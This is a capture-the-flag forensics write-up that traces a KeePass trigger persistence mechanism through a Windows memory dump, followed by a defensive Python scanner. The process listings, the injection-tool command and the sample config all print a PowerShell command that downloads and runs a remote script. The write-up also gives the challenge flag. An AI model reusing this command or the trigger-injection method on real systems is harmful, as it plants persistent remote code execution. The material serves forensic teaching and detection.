Steam Door

Steam-security analysts have spotted a new unknown persistence technique used in the wild. But they are not able to understand how it works since steam-technology is evolving at very fast rates. Please analyse this memory dump and find the persistence mechanism used by the malicious steam actors.
Flag format: HTB{md5sum}. For example: HTB{55e7dd3016ce4ac57b9a0f56af12f7c2}
Download: drive.google.com/file/d/1OP_r3c9Crvym28suH9K7ro5JNN0Pzx5_

Category: Forensics

Solver: lmarschk, mp455

Flag: HTB{db042f659831045cc3748324b481507e}

Writeup

Summary: Analysis of a Windows memory dump and extraction of a file from it.

We are given a memory dump, steam.raw. Using volatility 2.6.1 we analyse the memory from several directions. For example:

  • imageinfo: Windows Profile Win7SP1x86_23418

  • pstree:

    Name                                                  Pid   PPid   Thds   Hnds Time
    -------------------------------------------------- ------ ------ ------ ------ ----
    . 0x85169698:KeePass.exe                             2756   3344     10    229 2022-03-01 12:17:23 UTC+0000
    .. 0x85b31358:powershell.exe                          188   2756     13    335 2022-03-01 12:17:34 UTC+0000
    
  • cmdline -p 188:

    Command line : "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')

  • cmdscan:

    Cmd #0 @ 0x257f78: dir downloads
    Cmd #1 @ 0x257fa0: cd downloads
    Cmd #2 @ 0x264680: .\download.exe -t keepass -c "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -a "-c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')" -f C:\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml -m add
    

This information already tells a story. At some point in the past someone executed download.exe with a command (-c), an argument for that command (-a), a KeePass config file (-f), a mode (-m add) and a type (-t keepass). At the time of the memory dump, KeePass was running with a powershell.exe child process whose command line is exactly the argument passed via -a. From this we can reconstruct a plausible sequence of events: an attacker had access to this computer, downloaded the injection tool download.exe and ran it in its keepass mode, which inserts the powershell command from -a into KeePass.config.xml so that it is executed whenever KeePass runs. That is the persistence mechanism.

As we cannot find any further information about backup.ps1, let's try to recover KeePass.config.xml instead. While volatility's dumpfiles plugin does not find the file by default, the filescan plugin does:

0x000000003ef7ed58      8      0 R--r-- \Device\HarddiskVolume1\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml

With this offset, dumpfiles can extract the file: dumpfiles -Q 0x000000003ef7ed58. This gives us the manipulated KeePass config file, which contains a section with the powershell payload. Computing the md5sum of the dumped config file (do not remove any of the many null bytes at the end of the file!) yields the flag: HTB{db042f659831045cc3748324b481507e}
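As an added example (not part of the original writeup or the challenge files), the following Python script automates the two checks a defender would want here: hashing the dumped file over its raw bytes so the trailing null bytes are kept, and scanning a KeePass config for trigger actions that launch a download-and-execute command. The XML is constructed; the element names follow the KeePass 2.x trigger schema, while the GUID values and the trigger name are placeholders.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed sample of a KeePass 2.x config carrying one trigger. The element
# names follow the real trigger schema; the GUIDs and trigger name are placeholders
# and the action parameters are the command line seen in the memory dump.
SAMPLE_CONFIG = b"""<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Application>
    <TriggerSystem>
      <Triggers>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-GUID</Guid>
          <Name>backup</Name>
          <Events><Event><TypeGuid>PLACEHOLDER-EVENT-GUID</TypeGuid></Event></Events>
          <Actions>
            <Action>
              <TypeGuid>PLACEHOLDER-ACTION-GUID</TypeGuid>
              <Parameters>
                <Parameter>C:\\windows\\system32\\Windowspowershell\\v1.0\\powershell.exe</Parameter>
                <Parameter>-c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>""" + b"\x00" * 16   # dumpfiles pads the extracted file with null bytes

# Indicators of a download-and-execute action; extend as needed.
SUSPICIOUS = re.compile(r"powershell|iex|downloadstring|webclient|cmd\.exe|\.ps1", re.I)

def file_md5(data):
    """MD5 of the dumped file exactly as extracted: the trailing nulls are part of it."""
    return hashlib.md5(data).hexdigest()

def suspicious_triggers(config_bytes):
    """Return (trigger name, parameter) pairs whose action parameters match SUSPICIOUS."""
    text = config_bytes.rstrip(b"\x00")   # strip padding only for parsing, never before hashing
    root = ET.fromstring(text)
    hits = []
    for trig in root.iter("Trigger"):
        name = trig.findtext("Name", default="?")
        for param in trig.iter("Parameter"):
            if param.text and SUSPICIOUS.search(param.text):
                hits.append((name, param.text))
    return hits
```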